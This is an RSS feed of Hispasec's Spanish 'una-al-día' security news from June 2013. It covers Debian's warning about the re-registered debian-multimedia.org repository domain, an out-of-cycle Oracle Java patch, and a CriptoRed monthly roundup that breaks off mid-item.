<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-9000895764691586838</atom:id><lastBuildDate>Tue, 18 Jun 2013 16:25:22 +0000</lastBuildDate><category>vulnerabilidades</category><category>malware de la policía</category><category>X Window</category><category>registro</category><category>Bravia</category><category>Adobre</category><category>PayPal</category><category>Message Filter</category><category>Uplay</category><category>SurfRight</category><category>McAfee</category><category>Apple</category><category>teléfono</category><category>intypedia</category><category>gusanos</category><category>Cacti</category><category>RuggedCom</category><category>televisión</category><category>Dell</category><category>Eventos</category><category>Mac OS X</category><category>skimmer</category><category>Apache</category><category>Troyanos</category><category>Dropbox</category><category>Huawei</category><category>Struts</category><category>Telefónica</category><category>CSS</category><category>SQLite Journal</category><category>Pwn2Own</category><category>Linksys</category><category>BitCoin</category><category>RealPlayer</category><category>wireshark</category><category>Word</category><category>IIS</category><category>Plesk</category><category>Shockwave</category><category>Blackhole</category><category>Windows Server</category><category>curso</category><category>RECSI</category><category>Firefox</category><category>iTunes</category><category>drivers</category><category>ISC</category><category>cURL</category><category>Trustworthy Computing</category><category>WhatsApp</category><category>Broadcom</category><category>Internet Explorer</category><category>Webkit</category><category>Intel</category><category>AIX</category><category>iPrint</category><category>fuzzing</category><category>LibreOffice</category><category>Microsoft</category><category>SiPass</category><category>Backup Exec System Recovery</category><category>Exchange</category><category>UpToSecure 2013</category><category>VLC Player</category><category>Citadel</category><category>móvil</category><category>ModSecurity</category><category>Centralitas</category><category>Cisco ASA</category><category>Network Node Manager</category><category>UPnP</category><category>Antifraude</category><category>Chrome</category><category>plugin</category><category>Domino</category><category>Modern Warfare 3</category><category>WebEx</category><category>SSL</category><category>Ruby on Rails</category><category>cuentas</category><category>Gatekeeper</category><category>HitmanPro</category><category>certificados</category><category>virus de la policía</category><category>FinFisher</category><category>Criptored</category><category>PuTTy</category><category>Debian</category><category>Ubisoft</category><category>MediaWiki</category><category>TheFlame</category><category>WordPress</category><category>Boletines</category><category>0-day</category><category>Pidgin</category><category>Sybase</category><category>IBM Tivoli Storage Manager for Space Management</category><category>estándar</category><category>MICBypassCheck</category><category>PHP</category><category>Joomla</category><category>Ruby</category><category>Shamonn</category><category>virus</category><category>CA Technologies</category><category>Hardware</category><category>Samsung</category><category>Sourceforge</category><category>GroupWise</category><category>Call of Duty</category><category>Galaxy</category><category>crypt4you</category><category>Red Hat</category><category>Pharming</category><category>SPF</category><category>Radius</category><category>zbot</category><category>ATM</category><category>Kaspersky</category><category>WPS</category><category>Amazon</category><category>ciberseguridad</category><category>Kernel</category><category>Endpoint Protection</category><category>Congreso</category><category>Photoshop</category><category>Flash</category><category>libros</category><category>WPA-PSK</category><category>Hackstory</category><category>Safari</category><category>Buffalo</category><category>firmware</category><category>Network Access Control</category><category>Sudo</category><category>Criptografia</category><category>Sendmail</category><category>Adobe</category><category>SMS</category><category>HTC</category><category>H3C</category><category>Cross-site scripting</category><category>Thunderbird</category><category>AIR</category><category>Movistar</category><category>webcam</category><category>Asterisk</category><category>Ciberdefensa</category><category>MS-CHAP v2</category><category>MariaDB</category><category>IDA Pro</category><category>PostgreSQL</category><category>Viber</category><category>Redes Sociales</category><category>software</category><category>CCI</category><category>DB2</category><category>SeaMonkey</category><category>Denegación de Servicio</category><category>navegador</category><category>NNMi</category><category>winamp</category><category>TYPO3</category><category>exploit</category><category>ColdFusion</category><category>TASSI</category><category>vBulletin</category><category>Banca</category><category>Twitter</category><category>Phishing</category><category>Rockwell Automation</category><category>NFC</category><category>Reader</category><category>RootedCon</category><category>Google Play</category><category>Zero Day Initiative</category><category>Protección de Datos</category><category>Hotmail</category><category>RPC</category><category>Lotus</category><category>PlayStation</category><category>switch</category><category>eDirectory</category><category>OSX/Crisis</category><category>Tor</category><category>OpenSUSE</category><category>Tarjetas crédito</category><category>underground</category><category>libpng</category><category>RootedLabs</category><category>ASLR</category><category>Lunux</category><category>http server</category><category>Internet</category><category>Criptología</category><category>ZyXEL</category><category>micrófono</category><category>Actualización</category><category>ERP</category><category>Google Bouncer</category><category>Stuxnet</category><category>controladores</category><category>BlackBerry</category><category>Java</category><category>Zavio</category><category>Camaras IP</category><category>NVIDIA</category><category>Privacidad</category><category>Gates</category><category>RSA Authentication Manager</category><category>Malware</category><category>antivirus</category><category>ZDI</category><category>Botnet</category><category>Modo Protegido</category><category>Dorifel</category><category>Operación octubre rojo</category><category>TP-Link</category><category>Nimbuzz</category><category>SNMP</category><category>Market</category><category>RevTT</category><category>Office Signature Checker</category><category>hash</category><category>WebSphere Application Server</category><category>Cisco</category><category>Apple TV</category><category>Windows</category><category>RPM</category><category>Hispasec</category><category>RSA</category><category>Contraseñas</category><category>Adaptive Server Enterprise</category><category>Skype</category><category>BitTorrent</category><category>SAP</category><category>Foxit Reader</category><category>policía</category><category>nginx</category><category>Málaga</category><category>vulerabilidades</category><category>App Store</category><category>Flex</category><category>System Recovery</category><category>iOS</category><category>Vivotek</category><category>IBM</category><category>PCAnywhere</category><category>PassBook</category><category>mySQL</category><category>reseña</category><category>FWRulez</category><category>PDF</category><category>Origin</category><category>juego</category><category>DKIM</category><category>Opera</category><category>Technicolor</category><category>OpenOffice</category><category>autenticación</category><category>CA License</category><category>Tomcat</category><category>Netgear</category><category>Any Video Converter</category><category>VoIP</category><category>iPhone</category><category>VMware</category><category>Django</category><category>LaserJet</category><category>WinLockLess</category><category>VxWorks</category><category>GnuTLS</category><category>TapLogger</category><category>pfSense</category><category>Bind</category><category>Excel</category><category>Samba</category><category>Belkin</category><category>duqu</category><category>IBM Tivoli Storage Manager FastBack</category><category>OpenSSL</category><category>Acrobat</category><category>tumblr</category><category>Oracle</category><category>documento</category><category>OwnCloud</category><category>cifrado</category><category>Windows Phone</category><category>Shockwave Player</category><category>QuickTime</category><category>RegistryDate</category><category>Security Blogger Summit</category><category>TACACS+</category><category>CSRF</category><category>PPP</category><category>Facebook</category><category>SpyEye</category><category>HP</category><category>router</category><category>Mambo CMS</category><category>Websense</category><category>Office</category><category>CoDMW3</category><category>Tivoli</category><category>Instagram</category><category>SecureID</category><category>Google</category><category>ePolicy Orchestrator</category><category>Cisco Wireless LAN Controllers</category><category>LG Optimus G</category><category>UPM</category><category>Linux</category><category>fuera de ciclo</category><category>DoS</category><category>RuggedOS</category><category>VirusTotal</category><category>Ubuntu</category><category>Sophos</category><category>Fraude</category><category>PhpMyAdmin</category><category>3Com</category><category>Xen</category><category>Novell</category><category>DNS</category><category>IBM Lotus Notes</category><category>seguridad</category><category>D-Link</category><category>Resumen</category><category>Diginotar</category><category>Cisco ACS</category><category>MD5</category><category>Sony</category><category>Access Manager</category><category>WPA</category><category>Nokia</category><category>LiveUpdate</category><category>moodle</category><category>Google Drive</category><category>.NET Framework</category><category>Blogger</category><category>SuSE</category><category>rootkit</category><category>MayGion</category><category>Parallels</category><category>ransomware</category><category>ExploitShield</category><category>SmartFilter</category><category>descargas</category><category>Symantec</category><category>Bugzilla</category><category>JavaScript</category><category>XSS</category><category>DHCP</category><category>unaaldia</category><category>IBM Rational ClearQuest</category><category>informe</category><category>sandbox</category><category>Dufmoh</category><category>Kindle</category><category>passwords</category><category>transferencia ficticia</category><category>IBM Lotus Notes 8</category><category>Conferencias</category><category>64 bits</category><category>Firewall</category><category>Remote Desktop</category><category>impresoras</category><category>smatphone</category><category>Mozilla</category><category>Cámaras</category><category>cajeros</category><category>Siemens</category><category>utilidad</category><category>LG</category><category>NetWeaver</category><category>Android</category><category>mongoDB</category><category>Zabbix</category><category>File Reporter</category><category>Universal PnP</category><category>BOINC</category><category>Bit9</category><category>DNS Changer</category><category>Gadgets</category><category>applets</category><category>Nagios</category><category>iOS 6</category><category>protocolos</category><category>listas blancas</category><category>Sun</category><category>PKI</category><category>terminal</category><category>Scalance</category><category>Hitachi</category><category>vOlk</category><category>Zeus</category><category>token</category><category>WiFi</category><title>Hispasec @unaaldia</title><description>Servicio oficial de una-al-día ofrecido por Hispasec Sistemas.</description><link>http://unaaldia.hispasec.com/</link><managingEditor>noreply@blogger.com (Hispasec)</managingEditor><generator>Blogger</generator><openSearch:totalResults>5350</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/hispasec/zCAd" /><feedburner:info uri="hispasec/zcad" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-4578132156740228508</guid><pubDate>Tue, 18 Jun 2013 10:21:00 +0000</pubDate><atom:updated>2013-06-18T18:25:22.068+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Debian</category><title>Debian aconseja no confiar en el dominio debian-multimedia.org</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;El dominio no-oficial de software de terceros "&lt;/span&gt;&lt;i style="font-size: 13pt;"&gt;debian-multimedia.org&lt;/i&gt;&lt;span style="font-size: 13pt;"&gt;" fue abandonado hace unos meses por sus administradores. Posteriormente, el dominio expiró y &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;fue registrado el día 1 de enero de este año por alguien ajeno a la organización Debian&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; y desconocido por estos.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-VkkZg0G3M2Y/T-jQho_MGCI/AAAAAAAACnE/dc3rDEpgzZg/s1600/debian-logo.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-VkkZg0G3M2Y/T-jQho_MGCI/AAAAAAAACnE/dc3rDEpgzZg/s320/debian-logo.gif" width="242" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Anteriormente el dominio era usado para apuntar al repositorio no oficial de software multimedia para Debian. Tras una discusión en la lista de mantenedores de paquetes se llegó a un acuerdo para que no se usara el dominio "&lt;i&gt;debian-multimedia.org&lt;/i&gt;" y pasara a usarse el dominio "&lt;i&gt;deb-multimedia.org&lt;/i&gt;".&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Sin embargo, el dominio anterior podría encontrarse en la lista de fuentes de paquetes (source.list) de muchas distribuciones, sobre todo antiguas. Debido a que las intenciones del nuevo propietario del dominio no se conocen, &lt;b&gt;Debian ha optado por alertar a sus usuarios&lt;/b&gt; e &lt;a href="http://bits.debian.org/2013/06/remove-debian-multimedia.html"&gt;insta a borrar la entrada correspondiente en el archivo de fuentes de paquetes&lt;/a&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Un repositorio que se encuentre en el archivo sources.list y no sea controlado por alguien de la organización o reconocido por ellos, como es el caso, es totalmente inseguro ya que se podría utilizar para distribuir malware. Es por esto que Debian recomienda eliminar las ĺíneas concernientes a este repositorio del archivo sources.list.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En primer lugar, para comprobar si se tiene, se podría ejecutar esta orden en el terminal:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; font-size: 11.0pt; mso-ansi-language: EN-GB; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;grep
-i debian-multimedia.org /etc/apt/sources.list&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span lang="EN-GB" style="font-family: Courier; font-size: 11.0pt; mso-ansi-language: EN-GB; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;/etc/apt/sources.list.d/*&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Si devuelve algo&lt;/b&gt; (debian-multimedia.org), quiere decir que existe un archivo con este repositorio en alguna de sus líneas y &lt;b&gt;debería ser eliminado&lt;/b&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se recuerda también que no solo la distribución Debian está afectada ya que &lt;b&gt;existen multitud de distribuciones basadas en Debian que aprovechan los mismos repositorios &lt;/b&gt;de paquetes e incluso podrían contener la entrada mencionada en el archivo sources.list.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Debian - Remove unofficial debian-multimedia.org repository from your sources&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://bits.debian.org/2013/06/remove-debian-multimedia.html"&gt;&lt;span lang="EN-GB"&gt;http://bits.debian.org/2013/06/remove-debian-multimedia.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;on package duplication between Debian and debian-multimedia&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://lists.alioth.debian.org/pipermail/pkg-multimedia-maintainers/2012-May/026944.html"&gt;&lt;span lang="EN-GB"&gt;http://lists.alioth.debian.org/pipermail/pkg-multimedia-maintainers/2012-May/026944.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Software distributions based on Debian&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.debian.org/misc/children-distros"&gt;&lt;span lang="EN-GB"&gt;http://www.debian.org/misc/children-distros&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
David García&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;&lt;span lang="ES"&gt;&lt;a href="mailto:dgarcia@hispasec.com"&gt;dgarcia@hispasec.com&lt;/a&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Antonio Sánchez&lt;/span&gt;&lt;br /&gt;
&lt;a href="mailto:asanchez@hispasec.com"&gt;asanchez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/HTmqZa9KuIU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/HTmqZa9KuIU/debian-aconseja-no-confiar-en-el.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-VkkZg0G3M2Y/T-jQho_MGCI/AAAAAAAACnE/dc3rDEpgzZg/s72-c/debian-logo.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/debian-aconseja-no-confiar-en-el.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-7459445924500472095</guid><pubDate>Mon, 17 Jun 2013 14:43:00 +0000</pubDate><atom:updated>2013-06-18T00:00:30.173+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Oracle</category><title>Actualización fuera de ciclo para Java</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Oracle
se dispone a liberar un paquete de parches de seguridad para Java el próximo 18
de junio, fuera de su ciclo habitual cada tres meses. El motivo, como menciona
Oracle, se debe a que &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;al menos uno de
los fallos está siendo activamente explotado con éxito&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s1600/java_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s1600/java_logo.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
37 de las 40
vulnerabilidades están calificadas con una puntuación de 10 en la escala CVSS.
Es decir, su explotación conlleva la &lt;b&gt;ejecución
de código arbitrario en el equipo&lt;/b&gt;. Típicamente, las vulnerabilidades
encontradas en Java son explotadas a través de applets incrustados en páginas
webs comprometidas. La visita de estas páginas supone la explotación e
infección de un equipo cuya versión de Java no esté actualizada o que no
disponga de las políticas de restricción adecuadas que impidan la ejecución de
applets no confiables.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Estas 40 vulnerabilidades se suman a las 97 que lleva corregidas en lo
que va de año.&lt;/b&gt; Cabe recordar que 2012 se cerró con un total de 58. Oracle
ya desveló un cambio en la política de seguridad concerniente a Java, tal y
como dijo Nandini Ramani (Jefe del equipo de desarrollo de Java) el pasado 30
de mayo.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
A Oracle le han llovido las
críticas, en materia de seguridad, debido sobre todo a la demora en la
publicación de parches, a no mantener una política de seguridad proactiva
respecto a la búsqueda de fallos en su plataforma o la permisividad con la que
se ejecutaban los applets. En cada actualización se seguridad Oracle ha ido
restringiendo la ejecución de applets. Desde la eliminación de la opción "&lt;i&gt;baja&lt;/i&gt;" en el nivel de seguridad
hasta la prohibición de applets no firmados o autofirmados.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las versiones afectadas son:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
JDK y JRE 7 update 21 y
anteriores.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
JDK y JRE 6 update 45 y
anteriores.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
JDK y JRE 5.0 update 45 y
anteriores.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;JavaFX 2.2.21 y anteriores.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Oracle Java SE Critical Patch Update
Pre-Release Announcement - June 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html"&gt;&lt;span lang="EN-GB"&gt;http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Maintaining the security-worthiness of Java is
Oracle’s priority&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of"&gt;&lt;span lang="EN-GB"&gt;https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
David García&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;&lt;a href="mailto:dgarcia@hispasec.com"&gt;&lt;span lang="ES"&gt;dgarcia@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Antonio Sánchez&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:asanchez@hispasec.com"&gt;asanchez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/P5_KY7ltZL8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/P5_KY7ltZL8/actualizacion-fuera-de-ciclo-para-java.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s72-c/java_logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/actualizacion-fuera-de-ciclo-para-java.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-6717432273302576703</guid><pubDate>Sun, 16 Jun 2013 08:00:00 +0000</pubDate><atom:updated>2013-06-16T10:00:08.454+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Criptología</category><category domain="http://www.blogger.com/atom/ns#">Criptored</category><category domain="http://www.blogger.com/atom/ns#">Criptografia</category><title>Nuevos contenidos en la Red Temática CriptoRed (mayo de 2013)</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Breve resumen de las &lt;b&gt;novedades producidas durante el mes de mayo de 2013 en CriptoRed&lt;/b&gt;, &lt;st1:personname productid="la Red Temática" w:st="on"&gt;la Red Temática&lt;/st1:personname&gt; Iberoamericana de Criptografía y Seguridad de &lt;st1:personname productid="la Información." w:st="on"&gt;la Información.&lt;/st1:personname&gt; &lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
&lt;a href="http://3.bp.blogspot.com/-D9ViSMzHSUw/Ty-mcEw_V4I/AAAAAAAAAQU/fAXySukyGtw/s1600/logo_criptored.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-D9ViSMzHSUw/Ty-mcEw_V4I/AAAAAAAAAQU/fAXySukyGtw/s1600/logo_criptored.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;1. NUEVOS DOCUMENTOS EN &lt;st1:personname productid="LA RED TEMATICA" w:st="on"&gt;LA RED TEMATICA&lt;/st1:personname&gt; CRIPTORED EN EL MES DE MAYO DE 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.1. Lección 3 del MOOC Crypt4you de Privacidad "&lt;i&gt;Comunicaciones seguras mediante mensajería instantánea&lt;/i&gt;" (Luis Delgado, Consultor independiente, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/crypt4you/temas/privacidad-proteccion/leccion3/leccion3.html"&gt;http://www.criptored.upm.es/crypt4you/temas/privacidad-proteccion/leccion3/leccion3.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.2. Vídeo de la cuarta conferencia UPM TASSI 2013 Gobernando la seguridad hacia los objetivos corporativos (Antonio Ramos, ISACA Madrid, n+1 Intelligence &amp;amp; Research, leet security, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.youtube.com/watch?v=7s6HRI8j--E"&gt;&lt;span lang="EN-GB"&gt;http://www.youtube.com/watch?v=7s6HRI8j--E&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.3. Presentación de la cuarta conferencia UPM TASSI 2013 Gobernando la seguridad hacia los objetivos corporativos (Antonio Ramos, ISACA Madrid, n+1 Intelligence &amp;amp; Research, leet security, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
